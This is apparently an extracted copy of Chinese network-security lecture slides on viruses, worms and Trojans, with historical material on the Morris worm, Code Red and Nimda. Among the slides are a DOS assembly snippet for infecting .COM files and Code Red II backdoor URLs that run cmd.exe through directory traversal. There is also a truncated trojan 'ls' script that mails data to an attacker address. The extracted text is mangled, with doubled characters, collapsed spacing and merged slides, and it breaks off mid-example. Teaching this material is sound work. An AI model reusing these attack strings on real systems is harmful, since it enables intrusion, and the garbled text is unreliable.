計算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt

《計算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt》由會員分享，可在線閱讀，更多相關(guān)《計算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt（44頁珍藏版）》請?jiān)谘b配圖網(wǎng)上搜索。

計算機(jī)病毒、蠕蟲和特洛伊木馬,,提綱,計算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,計算機(jī)病毒,病毒結(jié)構(gòu)模型病毒的分類引導(dǎo)型病毒文件型病毒宏病毒病毒舉例病毒防范,計算機(jī)病毒的結(jié)構(gòu),傳染條件判斷,傳染代碼,表現(xiàn)及破壞條件判斷,破壞代碼,傳染模塊,表現(xiàn)模塊,計算機(jī)病毒的分類,按攻擊平臺分類：DOS,Win32，MAC，Unix按危害分類：良性、惡性按代碼形式：源碼、中間代碼、目標(biāo)碼按宿主分類：引導(dǎo)型主引導(dǎo)區(qū)操作系統(tǒng)引導(dǎo)區(qū)文件型操作系統(tǒng)應(yīng)用程序宏病毒,引導(dǎo)型病毒—引導(dǎo)記錄,主引導(dǎo)記錄（MBR）,A,引導(dǎo)型病毒——系統(tǒng)引導(dǎo)過程,PowerOn,CPUsetuptofindafileINT21;findthehostfileMOVAX,3D02;setuptoopenthehostfileINT21;openhostfileMOVAH,40;setuptowritefiletodiskINT21;writetofileDB*.COM;whatfilestolookfor,宏病毒（MacroVirus）,歷史：1980年，Dr.FredrickCohenandRalfBurger論文1994年，MicrosoftWord第一例宏病毒W(wǎng)ord,Excel,Access,PowerPoint,Project,LotusAmiPro,Visio,Lotus1-2-3,AutoCAD,CorelDraw.使用數(shù)據(jù)文件進(jìn)行傳播，使得反病毒軟件不再只關(guān)注可執(zhí)行文件和引導(dǎo)區(qū)DOEViRT統(tǒng)計，85%的病毒感染歸因于宏病毒易于編寫，只需要一兩天的時間，10－15行代碼大量的用戶：90MillionMSOfficeUsers人們通常不交換程序，而交換數(shù)據(jù),宏病毒工作機(jī)理,,有毒文件.doc,Normal.dot,無毒文件.doc,Normal.dot,注意事項(xiàng),Macro可以存在模板里，也可以存在文檔里RTF文件也可以包含宏病毒通過IE瀏覽器可以直接打開，而不提示下載,提綱,計算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,蠕蟲（Worm）,一個獨(dú)立的計算機(jī)程序，不需要宿主自我復(fù)制，自主傳播（Mobile）占用系統(tǒng)或網(wǎng)絡(luò)資源、破壞其他程序不偽裝成其他程序，靠自主傳播利用系統(tǒng)漏洞；利用電子郵件（無需用戶參與）,莫里斯蠕蟲事件,發(fā)生于1988年，當(dāng)時導(dǎo)致大約6000臺機(jī)器癱瘓主要的攻擊方法Rsh，rexec：用戶的缺省認(rèn)證Sendmail的debug模式Fingerd的緩沖區(qū)溢出口令猜測,CRI,主要影響WindowsNT系統(tǒng)和Windows2000主要影響國外網(wǎng)絡(luò)據(jù)CERT統(tǒng)計，至8月初已經(jīng)感染超過25萬臺主要行為利用IIS的Index服務(wù)的緩沖區(qū)溢出缺陷進(jìn)入系統(tǒng)檢查c:\notworm文件是否存在以判斷是否感染中文保護(hù)（是中文windows就不修改主頁）攻擊白宮！,CRII,InspiredbyRCI影響波及全球國內(nèi)影響尤其廣泛主要行為所利用缺陷相同只感染windows2000系統(tǒng)，由于一些參數(shù)的問題，只會導(dǎo)致NT死機(jī)休眠與掃描：中文windows，600個線程,Nimda簡介,影響系統(tǒng)：MSwin9x,wind2k,winXP傳播途徑：Email、文件共享、頁面瀏覽、MSIIS目錄遍歷、CodeRed后門影響群發(fā)電子郵件，付病毒掃描共享文件夾，掃描有漏洞的IIS,掃描有CodeRed后門的IISServer,紅色代碼病毒,紅色代碼病毒是一種結(jié)合了病毒、木馬、DDOS機(jī)制的蠕蟲。2001年7月中旬，在美國等地大規(guī)模蔓延。2001年8月初，出現(xiàn)變種coderedII，針對中文版windows系統(tǒng)，國內(nèi)大規(guī)模蔓延。通過80端口傳播。只存在與網(wǎng)絡(luò)服務(wù)器的內(nèi)存，不通過文件載體。利用IIS緩沖區(qū)溢出漏洞（2001年6月18日發(fā)布）,CodeRedI,在侵入一臺服務(wù)器后，其運(yùn)行步驟是：設(shè)置運(yùn)行環(huán)境，修改堆棧指針，設(shè)置堆棧大小為218h字節(jié)。接著使用RVA（相對虛擬地址）查找GetProcAddress的函數(shù)地址，然后就獲得其他socket、connect、send、recv、closesocket等函數(shù)地址；如果C:\notworm在，不再進(jìn)一步傳染；傳染其他主機(jī)。創(chuàng)造100個線程，其中99個用戶感染其他WEB服務(wù)器，被攻擊IP通過一個算法計算得出；篡改主頁，如果系統(tǒng)默認(rèn)語言為“美國英語”，第100個進(jìn)程就將這臺服務(wù)的主頁改成“Welcometo!,HackedByChinese!”，并持續(xù)10個小時。（這個修改直接在內(nèi)存中修改，而不是修改*.htm文件）；如果時間在20：00UTC和23：59UTC之間，將反復(fù)和白宮主頁建立連接，并發(fā)送98k字節(jié)數(shù)據(jù)，形成DDOS攻擊。,CodeRedII,增加了特洛依木馬的功能，并針對中國網(wǎng)站做了改進(jìn)計算IP的方法進(jìn)行了修改，使病毒傳染的更快；檢查是否存在CodeRedII原子，若存在則進(jìn)入睡眠狀態(tài)防止反復(fù)感染，若不存在則創(chuàng)建CodeRedII原子；創(chuàng)建300個線程進(jìn)行傳染，若系統(tǒng)默認(rèn)語言為簡體中文或繁體中文，則創(chuàng)建600個線程；檢查時間。病毒作者的意圖是傳播過程在2001年10月1日完成，之后，蠕蟲會爆發(fā)而使系統(tǒng)不斷重新啟動。在系統(tǒng)中安裝一個特洛依木馬：拷貝系統(tǒng)目錄cmd.exe到IIS的腳本執(zhí)行目錄下，改名為root.exe；將病毒體內(nèi)的木馬解壓縮寫到C盤和D盤的explorer.exe木馬每次系統(tǒng)和啟動都會運(yùn)行，禁止系統(tǒng)的文件保護(hù)功能，并將C盤和D盤通過web服務(wù)器共享,CodeRedII,攻擊形式http://x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp://x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻擊的IP地址，dir可以是任意命令，比如刪除系統(tǒng)中的文件，向外發(fā)送機(jī)密數(shù)據(jù)等，這個后門后來也成為了nimda病毒的一個傳播模式。下面是cert/cc上提供的被攻擊服務(wù)器日志(CA-2001-11)2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/../../winnt/system32/cmd.exe/c+dir200–2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/../../winnt/system32/cmd.exe/c+dir+..\200–,紅色代碼病毒的檢測和防范,針對安裝IIS的windows系統(tǒng)；是否出現(xiàn)負(fù)載顯著增加（CPU/網(wǎng)絡(luò)）的現(xiàn)象；用netstat–an檢查是否有許多對外的80端口連接在web日志中檢查是否有/default.ida?xxx..%u0078%u0000％u00=aHTTP/1.0這樣的攻擊記錄；查找系統(tǒng)中是否存在文件c:\explorer.exe或d:\explorer.exe以及root.exe；檢查注冊表文件中是否增加了C和D虛擬目錄，以及文件保護(hù)功能是否被禁止。在任務(wù)管理器中檢查是否存在兩個explorer.exe進(jìn)程。,提綱,計算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,特洛伊木馬,名字來源：古希臘故事通過偽裝成其他程序、有意隱藏自己惡意行為的程序，通常留下一個遠(yuǎn)程控制的后門沒有自我復(fù)制的功能非自主傳播用戶主動發(fā)送給其他人放到網(wǎng)站上由用戶下載,最簡單的木馬舉例,ls#!/bin/sh/bin/mailmyaddress@

配套講稿：

如PPT文件的首頁顯示word圖標(biāo)，表示該P(yáng)PT已包含配套word講稿。雙擊word圖標(biāo)可打開word文檔。

特殊限制：

部分文檔作品中含有的國旗、國徽等圖片，僅作為作品整體效果示例展示，禁止商用。設(shè)計者僅對作品中獨(dú)創(chuàng)性部分享有著作權(quán)。

關(guān) 鍵  詞：

計算機(jī)病毒 蠕蟲 特洛伊木馬 介紹 網(wǎng)絡(luò)安全 基礎(chǔ)課 講義